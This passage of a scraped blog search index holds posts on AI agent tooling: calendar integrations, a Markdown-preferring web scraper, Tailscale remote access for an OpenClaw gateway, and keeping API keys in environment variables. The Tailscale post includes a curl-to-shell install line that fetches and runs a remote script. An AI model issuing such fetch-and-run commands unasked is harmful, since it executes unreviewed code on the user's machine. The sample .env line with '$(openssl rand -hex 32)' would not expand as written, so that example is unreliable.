\u0026#39;Notion-Version\u0026#39;: \u0026#39;2022-06-28\u0026#39;, \u0026#39;Content-Type\u0026#39;: \u0026#39;application/json\u0026#39; } today = datetime.now().strftime(\u0026#39;%Y-%m-%d\u0026#39;) url = f\u0026#34;https://api.notion.com/v1/databases/{DATABASE_ID}/query\u0026#34; data = { \u0026#34;filter\u0026#34;: { \u0026#34;property\u0026#34;: DATE_PROPERTY, \u0026#34;date\u0026#34;: {\u0026#34;equals\u0026#34;: today} }, \u0026#34;sorts\u0026#34;: [{\u0026#34;property\u0026#34;: DATE_PROPERTY, \u0026#34;direction\u0026#34;: \u0026#34;ascending\u0026#34;}] } try: response = requests.post(url, headers=headers, json=data) results = response.json().get(\u0026#39;results\u0026#39;, []) if not results: return \u0026#34; • No schedule\u0026#34; lines = [] for item in results: props = item[\u0026#39;properties\u0026#39;] title = props[TITLE_PROPERTY][\u0026#39;title\u0026#39;][0][\u0026#39;text\u0026#39;][\u0026#39;content\u0026#39;] if props[TITLE_PROPERTY][\u0026#39;title\u0026#39;] else \u0026#39;Untitled\u0026#39; lines.append(f\u0026#34; • {title}\u0026#34;) return \u0026#39;\\n\u0026#39;.join(lines) except Exception as e: return f\u0026#34; ⚠️ Failed: {str(e)[:40]}\u0026#34; if __name__ == \u0026#39;__main__\u0026#39;: print(\u0026#34;📅 **Today\u0026#39;s Schedule**\u0026#34;) print(get_today_schedule()) Solution 4: Local Markdown File Who It\u0026rsquo;s For Privacy is top priority Don\u0026rsquo;t need multi-device sync Want the simplest solution to get started Key Advantages Fully offline - No external services Zero configuration - Create file and go Version control - Can use Git for history Setup from Scratch Create ~/.openclaw/schedule.md:\n# Schedule Management ## 2026-03-10 - [ ] 09:00 Morning meeting - [ ] 14:00 Project review - [ ] 20:00 Workout ## 2026-03-11 - [ ] 10:00 Client call Python code to read:\n#!/usr/bin/env python3 \u0026#34;\u0026#34;\u0026#34;Local Markdown Schedule Reader\u0026#34;\u0026#34;\u0026#34; import os import re from datetime import datetime def get_schedule(): schedule_file = os.path.expanduser(\u0026#39;~/.openclaw/schedule.md\u0026#39;) if not os.path.exists(schedule_file): return \u0026#34; • Schedule file not created\u0026#34; today = datetime.now().strftime(\u0026#39;%Y-%m-%d\u0026#39;) with open(schedule_file, \u0026#39;r\u0026#39;, encoding=\u0026#39;utf-8\u0026#39;) as f: content = f.read() # Find today\u0026#39;s schedule pattern = rf\u0026#39;## {today}\\n(.*?)(?=\\n## |\\Z)\u0026#39; match = re.search(pattern, content, re.DOTALL) if not match: return \u0026#34; • No schedule today\u0026#34; tasks = match.group(1).strip() lines = [line.strip() for line in tasks.split(\u0026#39;\\n\u0026#39;) if line.strip()] return \u0026#39;\\n\u0026#39;.join(lines) if lines else \u0026#34; • No schedule\u0026#34; if __name__ == \u0026#39;__main__\u0026#39;: print(\u0026#34;📅 **Today\u0026#39;s Schedule**\u0026#34;) print(get_schedule()) Solution Comparison Summary Network Stability (China Environment) Solution Access Speed Reliability Notes Google Calendar ⚠️ Slow ❌ Needs VPN Calendar + Tasks dual functionality, AI can read/write Outlook/365 ✅ Fast ✅ Stable Microsoft China CDN Notion ✅ Fast ✅ Stable Flexible database Markdown ✅ Local ✅ Perfect Completely offline AI Agent Autonomy Comparison Solution AI Can Read AI Can Create Setup Complexity Google Calendar ✅ ✅ ⭐⭐⭐ Hybrid auth required Outlook ✅ ✅ ⭐⭐ Azure config required Notion ✅ ✅ ⭐ Simple API Markdown ✅ ✅ ⭐ Local file operations Recommended Choice If you are\u0026hellip;\nOverseas user, need full Google ecosystem → Google Calendar (Service Account for calendar + OAuth for tasks hybrid) Enterprise/student with Microsoft account → Outlook (most stable in China) Already use Notion for everything → Notion Database (all-in-one) Minimalist/privacy-first → Markdown (simplest) Resources Google Calendar API Docs Google Tasks API Docs Microsoft Graph API Calendar Docs Notion API Docs Choose the solution that fits you best, and evolve your AI assistant from \u0026ldquo;can only answer\u0026rdquo; to \u0026ldquo;can proactively help manage your time.\u0026rdquo;\n","permalink":"https://www.d5n.xyz/en/posts/ai-schedule-solutions-comparison/","summary":"\u003ch2 id=\"why-do-ai-agents-need-schedule-management\"\u003eWhy Do AI Agents Need Schedule Management?\u003c/h2\u003e\n\u003cp\u003eWhen you ask your AI agent \u0026ldquo;What\u0026rsquo;s on my schedule today?\u0026rdquo; or \u0026ldquo;Create a meeting for tomorrow at 3 PM,\u0026rdquo; it should execute accurately, not say \u0026ldquo;I don\u0026rsquo;t know.\u0026rdquo;\u003c/p\u003e\n\u003cp\u003eA complete AI agent schedule system should have:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e📅 \u003cstrong\u003eRead schedules\u003c/strong\u003e - Know what\u0026rsquo;s happening today and tomorrow\u003c/li\u003e\n\u003cli\u003e⏰ \u003cstrong\u003eTimely reminders\u003c/strong\u003e - Push notifications at the right time\u003c/li\u003e\n\u003cli\u003e📝 \u003cstrong\u003eTask tracking\u003c/strong\u003e - Manage to-do items and completion status\u003c/li\u003e\n\u003cli\u003e🤖 \u003cstrong\u003eProactive creation\u003c/strong\u003e - AI can create new events and tasks for you\u003c/li\u003e\n\u003cli\u003e🔄 \u003cstrong\u003eMulti-device sync\u003c/strong\u003e - Accessible from phone, computer, and AI assistant\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eBut choosing the right solution isn\u0026rsquo;t easy—\u003cstrong\u003enetwork environment, configuration complexity, and usage habits\u003c/strong\u003e all affect the decision.\u003c/p\u003e","title":"AI Agent Schedule Management: Comparing Google, Outlook, Notion, and Local Solutions"},{"content":"The Problem: Pain Points of AI Web Scraping When you ask an AI Agent to fetch web content, you typically encounter these issues:\nToo much HTML noise - Navigation bars, ads, sidebars, scripts, styles\u0026hellip; Massive token consumption - 2,000 words of content might require 15,000+ tokens of HTML Difficult parsing - AI needs to extract useful info from complex HTML High costs - With token-based pricing, this directly means money Cloudflare Markdown for Agents was created to solve this problem.\nWhat is Cloudflare Markdown for Agents? Launched by Cloudflare in February 2026, this feature automatically converts HTML to Markdown when AI Agents scrape websites that have it enabled.\nHow Significant is the Effect? According to Cloudflare\u0026rsquo;s official data:\nA blog post in HTML format: ~16,180 tokens Converted to Markdown: only ~3,150 tokens ~80% reduction in token consumption How It Works When an AI Agent sends an HTTP request with this header:\nAccept: text/markdown If the website has Cloudflare Markdown for Agents enabled, Cloudflare converts the HTML to Markdown at the edge and returns it to the AI Agent.\nThe returned content:\n✅ Automatically removes HTML tags, CSS, JavaScript ✅ Preserves semantic structure (headings, lists, links, etc.) ✅ Easier for AI to parse, less noise ✅ Significantly reduces token consumption Practical: How to Make AI Agents Fetch Markdown Format Regardless of whether the target website has Cloudflare Markdown for Agents enabled, you can optimize your scraping using the following methods.\nMethod 1: Request Markdown Format (If Supported) The simplest approach is to declare in the HTTP request header that you accept Markdown format:\nimport requests headers = { \u0026#39;Accept\u0026#39;: \u0026#39;text/markdown, text/html;q=0.8\u0026#39; } response = requests.get(\u0026#39;https://example.com/article/\u0026#39;, headers=headers) # Check the returned content type if \u0026#39;markdown\u0026#39; in response.headers.get(\u0026#39;Content-Type\u0026#39;, \u0026#39;\u0026#39;): print(\u0026#34;✅ Got Markdown format\u0026#34;) content = response.text else: print(\u0026#34;ℹ️ Got HTML, needs conversion\u0026#34;) content = html_to_markdown(response.text) Check if website supports it:\nIf the returned Content-Type contains text/markdown, it\u0026rsquo;s supported Currently, not many websites support this, but the number is growing Method 2: Try Markdown Version URLs Some websites actively provide Markdown versions, typically with these URL patterns:\nhttps://example.com/posts/article-title/index.md https://example.com/posts/article-title.md https://example.com/api/content/article-title?format=md Scraping strategy:\nFirst try URLs with .md or /index.md suffix If not found, fall back to regular HTML scraping Convert HTML to Markdown Method 3: Use the Smart Fetch Tool I\u0026rsquo;ve written a complete tool that automates the above workflow:\nsmart_fetch.py core features:\nPrioritizes Markdown format requests Automatically detects return type If HTML is returned, automatically converts to Markdown Extracts main content, removes navigation and ads Complete source code:\n#!/usr/bin/env python3 \u0026#34;\u0026#34;\u0026#34; Smart Fetch - Intelligent Web Scraping Tool Supports Cloudflare Markdown for Agents Auto-detects and handles Markdown/HTML responses \u0026#34;\u0026#34;\u0026#34; import sys import urllib.request import urllib.error from html.parser import HTMLParser import re class HTMLToMarkdown(HTMLParser): \u0026#34;\u0026#34;\u0026#34;HTML to Markdown converter\u0026#34;\u0026#34;\u0026#34; def __init__(self): super().__init__() self.result = [] self.in_script = False self.in_style = False self.skip_tags = {\u0026#39;script\u0026#39;, \u0026#39;style\u0026#39;, \u0026#39;nav\u0026#39;, \u0026#39;header\u0026#39;, \u0026#39;footer\u0026#39;, \u0026#39;aside\u0026#39;} def handle_starttag(self, tag, attrs): if tag in (\u0026#39;script\u0026#39;, \u0026#39;style\u0026#39;): self.in_script = tag == \u0026#39;script\u0026#39; self.in_style = tag == \u0026#39;style\u0026#39; elif tag in self.skip_tags: pass elif tag == \u0026#39;h1\u0026#39;: self.result.append(\u0026#39;\\n# \u0026#39;) elif tag == \u0026#39;h2\u0026#39;: self.result.append(\u0026#39;\\n## \u0026#39;) elif tag == \u0026#39;h3\u0026#39;: self.result.append(\u0026#39;\\n### \u0026#39;) elif tag == \u0026#39;h4\u0026#39;: self.result.append(\u0026#39;\\n#### \u0026#39;) elif tag == \u0026#39;p\u0026#39;: self.result.append(\u0026#39;\\n\u0026#39;) elif tag == \u0026#39;br\u0026#39;: self.result.append(\u0026#39;\\n\u0026#39;) elif tag == \u0026#39;a\u0026#39;: attrs_dict = dict(attrs) if \u0026#39;href\u0026#39; in attrs_dict: self.result.append(f\u0026#39;[{attrs_dict.get(\u0026#34;title\u0026#34;, \u0026#34;\u0026#34;) or attrs_dict.get(\u0026#34;href\u0026#34;, \u0026#34;\u0026#34;)}](\u0026#39;) elif tag == \u0026#39;img\u0026#39;: attrs_dict = dict(attrs) alt = attrs_dict.get(\u0026#39;alt\u0026#39;, \u0026#39;\u0026#39;) src = attrs_dict.get(\u0026#39;src\u0026#39;, \u0026#39;\u0026#39;) if src: self.result.append(f\u0026#39;![{alt}]({src})\u0026#39;) elif tag in (\u0026#39;ul\u0026#39;, \u0026#39;ol\u0026#39;): self.result.append(\u0026#39;\\n\u0026#39;) elif tag == \u0026#39;li\u0026#39;: self.result.append(\u0026#39;- \u0026#39;) elif tag in (\u0026#39;strong\u0026#39;, \u0026#39;b\u0026#39;): self.result.append(\u0026#39;**\u0026#39;) elif tag in (\u0026#39;em\u0026#39;, \u0026#39;i\u0026#39;): self.result.append(\u0026#39;*\u0026#39;) elif tag == \u0026#39;code\u0026#39;: self.result.append(\u0026#39;`\u0026#39;) elif tag == \u0026#39;pre\u0026#39;: self.result.append(\u0026#39;\\n```\\n\u0026#39;) def handle_endtag(self, tag): if tag == \u0026#39;script\u0026#39;: self.in_script = False elif tag == \u0026#39;style\u0026#39;: self.in_style = False elif tag in self.skip_tags: pass elif tag in (\u0026#39;h1\u0026#39;, \u0026#39;h2\u0026#39;, \u0026#39;h3\u0026#39;, \u0026#39;h4\u0026#39;, \u0026#39;p\u0026#39;, \u0026#39;li\u0026#39;): self.result.append(\u0026#39;\\n\u0026#39;) elif tag == \u0026#39;a\u0026#39;: self.result.append(\u0026#39;)\u0026#39;) elif tag in (\u0026#39;strong\u0026#39;, \u0026#39;b\u0026#39;): self.result.append(\u0026#39;**\u0026#39;) elif tag in (\u0026#39;em\u0026#39;, \u0026#39;i\u0026#39;): self.result.append(\u0026#39;*\u0026#39;) elif tag == \u0026#39;code\u0026#39;: self.result.append(\u0026#39;`\u0026#39;) elif tag == \u0026#39;pre\u0026#39;: self.result.append(\u0026#39;\\n```\\n\u0026#39;) def handle_data(self, data): if self.in_script or self.in_style: return text = data.strip() if text: self.result.append(text) def get_markdown(self): return \u0026#39;\u0026#39;.join(self.result) def smart_fetch(url, max_chars=5000): \u0026#34;\u0026#34;\u0026#34;Smart web content fetching\u0026#34;\u0026#34;\u0026#34; headers = { \u0026#39;User-Agent\u0026#39;: \u0026#39;Mozilla/5.0 (compatible; AI-Agent/1.0; +https://www.d5n.xyz)\u0026#39;, \u0026#39;Accept\u0026#39;: \u0026#39;text/markdown, text/plain;q=0.9, text/html;q=0.8\u0026#39;, \u0026#39;Accept-Language\u0026#39;: \u0026#39;en-US,en;q=0.9\u0026#39;, \u0026#39;Accept-Encoding\u0026#39;: \u0026#39;identity\u0026#39;, \u0026#39;Connection\u0026#39;: \u0026#39;keep-alive\u0026#39;, } try: req = urllib.request.Request(url, headers=headers, method=\u0026#39;GET\u0026#39;) with urllib.request.urlopen(req, timeout=30) as response: content_type = response.headers.get(\u0026#39;Content-Type\u0026#39;, \u0026#39;\u0026#39;).lower() raw_data = response.read() try: content = raw_data.decode(\u0026#39;utf-8\u0026#39;) except UnicodeDecodeError: try: content = raw_data.decode(\u0026#39;gbk\u0026#39;) except: content = raw_data.decode(\u0026#39;utf-8\u0026#39;, errors=\u0026#39;ignore\u0026#39;) if \u0026#39;markdown\u0026#39; in content_type: print(f\u0026#34;✅ Got Markdown format\u0026#34;, file=sys.stderr) return content[:max_chars] if \u0026#39;text/plain\u0026#39; in content_type: return content[:max_chars] print(f\u0026#34;🔄 Got HTML, converting to Markdown\u0026#34;, file=sys.stderr) converter = HTMLToMarkdown() body_match = re.search(r\u0026#39;\u0026lt;body[^\u0026gt;]*\u0026gt;(.*?)\u0026lt;/body\u0026gt;\u0026#39;, content, re.DOTALL | re.IGNORECASE) if body_match: body_content = body_match.group(1) else: body_content = content converter.feed(body_content) markdown = converter.get_markdown() markdown = re.sub(r\u0026#39;\\n{3,}\u0026#39;, \u0026#39;\\n\\n\u0026#39;, markdown) return markdown[:max_chars] except Exception as e: return f\u0026#34;❌ Error: {str(e)}\u0026#34; if __name__ == \u0026#34;__main__\u0026#34;: if len(sys.argv) \u0026lt; 2: print(\u0026#34;Usage: python3 smart_fetch.py \u0026lt;URL\u0026gt; [max_chars]\u0026#34;) sys.exit(1) url = sys.argv[1] max_chars = int(sys.argv[2]) if len(sys.argv) \u0026gt; 2 else 5000 print(smart_fetch(url, max_chars)) Usage examples:\n# Fetch web page, auto-handle Markdown/HTML python3 smart_fetch.py \u0026#34;https://example.com/article/\u0026#34; # Limit returned characters python3 smart_fetch.py \u0026#34;https://example.com/article/\u0026#34; 3000 Advanced: Search + Fetch Integration In practice, you usually need to search first, then fetch detailed content. I\u0026rsquo;ve combined SearXNG search and Smart Fetch into a complete tool chain.\nsearch_and_fetch.py complete source code:\n#!/usr/bin/env python3 \u0026#34;\u0026#34;\u0026#34; SearXNG + Smart Fetch combo tool Search first, then intelligently fetch detailed content \u0026#34;\u0026#34;\u0026#34; import sys import urllib.request import urllib.error import urllib.parse import json import subprocess import os SCRIPT_DIR = os.path.dirname(os.path.abspath(__file__)) SEARXNG_URL = \u0026#34;http://localhost:8888\u0026#34; def searxng_search(query, num_results=5): \u0026#34;\u0026#34;\u0026#34;Search using SearXNG\u0026#34;\u0026#34;\u0026#34; try: url = f\u0026#34;{SEARXNG_URL}/search?q={urllib.parse.quote(query)}\u0026amp;format=json\u0026#34; req = urllib.request.Request(url, headers={ \u0026#39;User-Agent\u0026#39;: \u0026#39;Mozilla/5.0 (compatible; AI-Agent/1.0)\u0026#39; }) with urllib.request.urlopen(req, timeout=30) as response: data = json.loads(response.read().decode(\u0026#39;utf-8\u0026#39;)) return data.get(\u0026#39;results\u0026#39;, [])[:num_results] except Exception as e: print(f\u0026#34;❌ Search failed: {e}\u0026#34;, file=sys.stderr) return [] def smart_fetch(url, max_chars=3000): \u0026#34;\u0026#34;\u0026#34;Call smart_fetch.py to get content\u0026#34;\u0026#34;\u0026#34; try: result = subprocess.run( [\u0026#39;python3\u0026#39;, os.path.join(SCRIPT_DIR, \u0026#39;smart_fetch.py\u0026#39;), url, str(max_chars)], capture_output=True, text=True, timeout=30 ) return result.stdout except Exception as e: return f\u0026#34;❌ Fetch failed: {e}\u0026#34; def main(): if len(sys.argv) \u0026lt; 2: print(\u0026#34;\u0026#34;\u0026#34;Usage: python3 search_and_fetch.py \u0026#34;query\u0026#34; [num_results] [brief|full] Options: num_results - Number of search results (default: 5) fetch_depth - brief (summary) | full (complete) (default: brief) Examples: python3 search_and_fetch.py \u0026#34;OpenClaw tutorial\u0026#34; python3 search_and_fetch.py \u0026#34;AI news\u0026#34; 3 full \u0026#34;\u0026#34;\u0026#34;) sys.exit(1) query = sys.argv[1] num_results = int(sys.argv[2]) if len(sys.argv) \u0026gt; 2 else 5 fetch_depth = sys.argv[3] if len(sys.argv) \u0026gt; 3 else \u0026#39;brief\u0026#39; print(f\u0026#34;🔍 Searching: {query}\\n\u0026#34;) # 1. Search results = searxng_search(query, num_results) if not results: print(\u0026#34;No results found\u0026#34;) sys.exit(1) # 2. Fetch details for i, result in enumerate(results, 1): title = result.get(\u0026#39;title\u0026#39;, \u0026#39;No title\u0026#39;) url = result.get(\u0026#39;url\u0026#39;, \u0026#39;\u0026#39;) content = result.get(\u0026#39;content\u0026#39;, \u0026#39;\u0026#39;) print(f\u0026#34;\\n{\u0026#39;=\u0026#39;*60}\u0026#34;) print(f\u0026#34;{i}. {title}\u0026#34;) print(f\u0026#34; URL: {url}\u0026#34;) print(f\u0026#34;{\u0026#39;=\u0026#39;*60}\\n\u0026#34;) if content: print(f\u0026#34;📄 Summary: {content[:200]}...\u0026#34;) if fetch_depth == \u0026#39;full\u0026#39; and url: print(f\u0026#34;\\n🔄 Fetching full content...\u0026#34;) detail = smart_fetch(url, 3000) print(f\u0026#34;\\n📄 Full content:\\n{detail[:1500]}...\u0026#34;) print() if __name__ == \u0026#34;__main__\u0026#34;: main() Usage:\n# Search and get summaries ./search-and-fetch.sh \u0026#34;OpenClaw tutorial\u0026#34; 5 brief # Search and fetch full articles ./search-and-fetch.sh \u0026#34;AI safety research\u0026#34; 3 full For setting up SearXNG search, check out my previous post:\nSearch Solutions for AI Agents: SearXNG vs. Tavily vs. Custom Real-World Impact Test Scenario: Scraping a Technical Blog Post Method Content-Type Token Count Effect Regular HTML text/html ~5,000 Contains navigation, styles, noise Markdown format text/markdown ~1,000 Only main content Savings - ~80% ✅ Significant optimization Benefits for AI Agents Lower costs - 60-80% reduction in token consumption Faster processing - Less content to parse Better accuracy - Reduced HTML noise interference Longer context - Same context window can hold more content Appendix: Making Your Website Support Markdown Format If you want your own website to support Markdown for Agents, here are implementation methods.\nExample: Hugo Configure in hugo.toml:\n[outputs] page = [\u0026#34;HTML\u0026#34;, \u0026#34;Markdown\u0026#34;] [outputFormats.Markdown] mediatype = \u0026#34;text/markdown\u0026#34; baseName = \u0026#34;index\u0026#34; isPlainText = true Create layouts/_default/single.md template:\n--- title: \u0026#34;{{ .Title }}\u0026#34; date: {{ .Date }} --- {{ .RawContent }} After building, each post generates both index.html and index.md.\nFor Other Platforms WordPress: Use plugins to generate Markdown versions Next.js/Gatsby: Generate .md files at build time Docusaurus/VitePress: Markdown source files, provide direct access Custom systems: Write both HTML and Markdown when publishing Summary Key Points Request headers are key - Use Accept: text/markdown to request Markdown format Try Markdown URLs - Some websites provide /index.md direct access Auto-conversion fallback - Use Smart Fetch tool for automatic HTML→Markdown conversion Integrated tools for efficiency - Search+fetch integration, complete workflow Applicable Scenarios ✅ AI assistant real-time Q\u0026amp;A (needs to fetch external sources) ✅ Content aggregation and analysis (batch processing articles) ✅ Automated monitoring (regular update checks) ✅ Research assistance (quick access to clean content) Resources Cloudflare Markdown for Agents docs Hugo Configure Outputs Search Solutions Comparison Complete source code examples available on GitHub. Feedback welcome!\n","permalink":"https://www.d5n.xyz/en/posts/markdown-for-agents-guide/","summary":"\u003ch2 id=\"the-problem-pain-points-of-ai-web-scraping\"\u003eThe Problem: Pain Points of AI Web Scraping\u003c/h2\u003e\n\u003cp\u003eWhen you ask an AI Agent to fetch web content, you typically encounter these issues:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eToo much HTML noise\u003c/strong\u003e - Navigation bars, ads, sidebars, scripts, styles\u0026hellip;\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eMassive token consumption\u003c/strong\u003e - 2,000 words of content might require 15,000+ tokens of HTML\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eDifficult parsing\u003c/strong\u003e - AI needs to extract useful info from complex HTML\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eHigh costs\u003c/strong\u003e - With token-based pricing, this directly means money\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eCloudflare Markdown for Agents\u003c/strong\u003e was created to solve this problem.\u003c/p\u003e","title":"Leveraging Cloudflare Markdown for Agents: Optimize AI Content Fetching"},{"content":"Introduction OpenClaw Gateway runs locally by default (127.0.0.1:18789), which means:\n✅ Secure: No external access ❌ Limited: Can only be used locally If you want to:\nRun OpenClaw on your home server and access it remotely from your phone Share an OpenClaw instance with your team Use your home AI assistant while away Then Tailscale integration is your best choice.\nWhat is Tailscale? Tailscale is a zero-config VPN tool based on WireGuard. It lets you easily build a private network (Tailnet) and securely connect any devices.\nKey Benefits Feature Description Zero Config No firewall rules or port forwarding needed End-to-End Encryption WireGuard protocol, secure and reliable Cross-Platform Linux, macOS, Windows, iOS, Android Free Tier Free for personal use, up to 20 devices Two Tailscale Modes OpenClaw supports two Tailscale modes:\ntailscale serve - Tailnet-only access (private) tailscale funnel - Public internet access (requires password) What Can OpenClaw + Tailscale Do? Scenario 1: Tailscale Serve (Recommended for Personal Use) Use Cases:\nRun OpenClaw on home NAS/server Access remotely from phone/laptop via Tailscale Only your devices can access Network Topology:\n[Phone] ←──Tailnet──→ [Tailscale] ←──localhost──→ [OpenClaw Gateway] [Laptop] ←──Encrypted Tunnel──→ 192.168.x.x:18789 Scenario 2: Tailscale Funnel (Public Access) Use Cases:\nTeam collaboration, sharing one OpenClaw instance Temporary access from devices without Tailscale Access via public URL (e.g., https://your-machine.tailnet-xx.ts.net) ⚠️ Security Warning:\nFunnel exposes your service to the public internet Password authentication is mandatory, otherwise anyone can access your Gateway Recommended: gateway.auth.mode: \u0026quot;password\u0026quot; Configuration Steps Prerequisites Install Tailscale\n# Debian/Ubuntu curl -fsSL https://tailscale.com/install.sh | sh # macOS brew install tailscale Login to Tailscale\nsudo tailscale up # Follow browser prompts to authorize Verify Tailscale IP\ntailscale ip -4 # Output: 100.x.y.z Configure OpenClaw Edit ~/.openclaw/openclaw.json:\nOption A: Tailscale Serve (Private) { \u0026#34;gateway\u0026#34;: { \u0026#34;port\u0026#34;: 18789, \u0026#34;mode\u0026#34;: \u0026#34;tailscale\u0026#34;, \u0026#34;auth\u0026#34;: { \u0026#34;mode\u0026#34;: \u0026#34;token\u0026#34;, \u0026#34;token\u0026#34;: \u0026#34;your-secure-token\u0026#34; }, \u0026#34;tailscale\u0026#34;: { \u0026#34;mode\u0026#34;: \u0026#34;serve\u0026#34;, \u0026#34;resetOnExit\u0026#34;: false } } } Access: Only devices with Tailscale on the same account\nOption B: Tailscale Funnel (Public) { \u0026#34;gateway\u0026#34;: { \u0026#34;port\u0026#34;: 18789, \u0026#34;mode\u0026#34;: \u0026#34;tailscale\u0026#34;, \u0026#34;auth\u0026#34;: { \u0026#34;mode\u0026#34;: \u0026#34;password\u0026#34;, \u0026#34;password\u0026#34;: \u0026#34;your-strong-password\u0026#34; }, \u0026#34;tailscale\u0026#34;: { \u0026#34;mode\u0026#34;: \u0026#34;funnel\u0026#34;, \u0026#34;resetOnExit\u0026#34;: true } } } ⚠️ Password is mandatory for Funnel mode!\nRestart Gateway openclaw gateway restart Security Best Practices Prefer Serve Mode - Unless you need public access Use Strong Passwords for Funnel openssl rand -base64 32 Enable resetOnExit for Funnel Rotate tokens/passwords regularly FAQ Q: What\u0026rsquo;s the difference between local and Tailscale modes?\nFeature Local Tailscale Serve Tailscale Funnel Access Local only Tailnet devices Public internet Encryption None WireGuard WireGuard + TLS Needs Tailscale No Yes Yes Password Optional Optional Required Q: Can I use both local and Tailscale?\nNo. Gateway can only bind to one mode. Use Tailscale Serve + install Tailscale on local devices.\nQ: How do I find my Tailscale hostname?\ntailscale status Example output:\n100.x.x.x your-hostname your@email.com linux - The your-hostname column is what you need.\nOr directly:\ntailscale ip -4 --hostname Customize hostname:\n# On first login sudo tailscale up --hostname=my-openclaw-server # Or rename in Tailscale admin console: # https://login.tailscale.com/admin/machines Summary Need Recommended Local only bind: loopback (default) Multi-device private tailscale: serve Team/public tailscale: funnel + password Tailscale makes OpenClaw remote access simple and secure—no firewall configuration, no port forwarding, deployed in minutes.\nReferences:\nTailscale Docs OpenClaw Gateway Config ","permalink":"https://www.d5n.xyz/en/posts/openclaw-tailscale-guide/","summary":"\u003ch2 id=\"introduction\"\u003eIntroduction\u003c/h2\u003e\n\u003cp\u003eOpenClaw Gateway runs locally by default (\u003ccode\u003e127.0.0.1:18789\u003c/code\u003e), which means:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e✅ Secure: No external access\u003c/li\u003e\n\u003cli\u003e❌ Limited: Can only be used locally\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eIf you want to:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eRun OpenClaw on your home server and access it remotely from your phone\u003c/strong\u003e\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eShare an OpenClaw instance with your team\u003c/strong\u003e\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eUse your home AI assistant while away\u003c/strong\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eThen \u003cstrong\u003eTailscale\u003c/strong\u003e integration is your best choice.\u003c/p\u003e\n\u003chr\u003e\n\u003ch2 id=\"what-is-tailscale\"\u003eWhat is Tailscale?\u003c/h2\u003e\n\u003cp\u003e\u003ca href=\"https://tailscale.com/\"\u003eTailscale\u003c/a\u003e is a zero-config VPN tool based on WireGuard. It lets you easily build a private network (Tailnet) and securely connect any devices.\u003c/p\u003e","title":"OpenClaw + Tailscale Remote Access Guide: Two Secure Ways to Expose Your Gateway"},{"content":"The Problem with Plaintext Keys When setting up OpenClaw, you\u0026rsquo;re dealing with sensitive credentials:\nDiscord Bot Tokens AI API Keys (Kimi, OpenAI, etc.) Service credentials The temptation: Just paste them into openclaw.json\nThe risk: One accidental git commit, and your keys are public.\nThe Solution: Environment Variables OpenClaw supports referencing environment variables in configuration. Your config file only contains placeholders, actual values live in environment variables.\nHow It Works { \u0026#34;channels\u0026#34;: { \u0026#34;discord\u0026#34;: { \u0026#34;token\u0026#34;: \u0026#34;${env:DISCORD_BOT_TOKEN}\u0026#34; } } } The ${env:VAR_NAME} syntax tells OpenClaw to read from environment variables at runtime.\nSupported Environment Variables Based on OpenClaw source code, these are officially supported:\nService Variable Name Config Path Discord DISCORD_BOT_TOKEN channels.discord.token Kimi AI KIMI_API_KEY Auth profiles Moonshot MOONSHOT_API_KEY Auth profiles OpenAI OPENAI_API_KEY Model providers Anthropic ANTHROPIC_API_KEY Model providers Gateway OPENCLAW_GATEWAY_TOKEN gateway.auth.token Full list from source:\nOPENAI_API_KEY, ANTHROPIC_API_KEY, ANTHROPIC_OAUTH_TOKEN, GEMINI_API_KEY, ZAI_API_KEY, OPENROUTER_API_KEY, AI_GATEWAY_API_KEY, MINIMAX_API_KEY, SYNTHETIC_API_KEY, KILOCODE_API_KEY, ELEVENLABS_API_KEY, TELEGRAM_BOT_TOKEN, DISCORD_BOT_TOKEN, SLACK_BOT_TOKEN, SLACK_APP_TOKEN, OPENCLAW_GATEWAY_TOKEN, OPENCLAW_GATEWAY_PASSWORD, KIMI_API_KEY, MOONSHOT_API_KEY Setup Methods Method 1: Shell Environment export DISCORD_BOT_TOKEN=\u0026#34;your-token-here\u0026#34; export KIMI_API_KEY=\u0026#34;your-key-here\u0026#34; openclaw gateway restart Pros: Quick, good for testing\nCons: Lost on shell exit, not persistent\nMethod 2: Environment File (Recommended) Create ~/.openclaw/.env:\nDISCORD_BOT_TOKEN=your-token-here KIMI_API_KEY=your-key-here OpenClaw automatically loads this on startup.\nPros: Persistent, organized, no shell pollution\nCons: File permissions matter\nSecure the file:\nchmod 600 ~/.openclaw/.env Method 3: Systemd Service For systemd-managed gateway, edit the service file:\n[Service] EnvironmentFile=/home/warwick/.openclaw/.env Then reload:\nsystemctl --user daemon-reload systemctl --user restart openclaw-gateway Complete Configuration Example 1. Create Environment File ~/.openclaw/.env:\n# Discord DISCORD_BOT_TOKEN=MTQ2Njc4MDY2NzgwNjIyMDM2NA.GvboSs.xxxxxxxxxxxxxxxxxxxxx # AI Services KIMI_API_KEY=sk-kimi-xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx # Gateway Auth OPENCLAW_GATEWAY_TOKEN=$(openssl rand -hex 32) 2. Update openclaw.json { \u0026#34;channels\u0026#34;: { \u0026#34;discord\u0026#34;: { \u0026#34;enabled\u0026#34;: true, \u0026#34;token\u0026#34;: \u0026#34;${env:DISCORD_BOT_TOKEN}\u0026#34; } }, \u0026#34;gateway\u0026#34;: { \u0026#34;auth\u0026#34;: { \u0026#34;mode\u0026#34;: \u0026#34;token\u0026#34;, \u0026#34;token\u0026#34;: \u0026#34;${env:OPENCLAW_GATEWAY_TOKEN}\u0026#34; } } } 3. Restart Gateway openclaw gateway restart Security Best Practices 1. Never Commit .env Files Add to .gitignore:\n.env .env.local *.env openclaw.json.bak 2. Use Different Tokens for Different Environments # Production DISCORD_BOT_TOKEN_PROD=xxx # Development DISCORD_BOT_TOKEN_DEV=yyy 3. Rotate Keys Regularly Set a calendar reminder every 90 days to regenerate tokens.\n4. Audit Your Config openclaw secrets audit This shows which keys are still in plaintext.\n5. Backup Strategy # Backup config (without secrets) cp 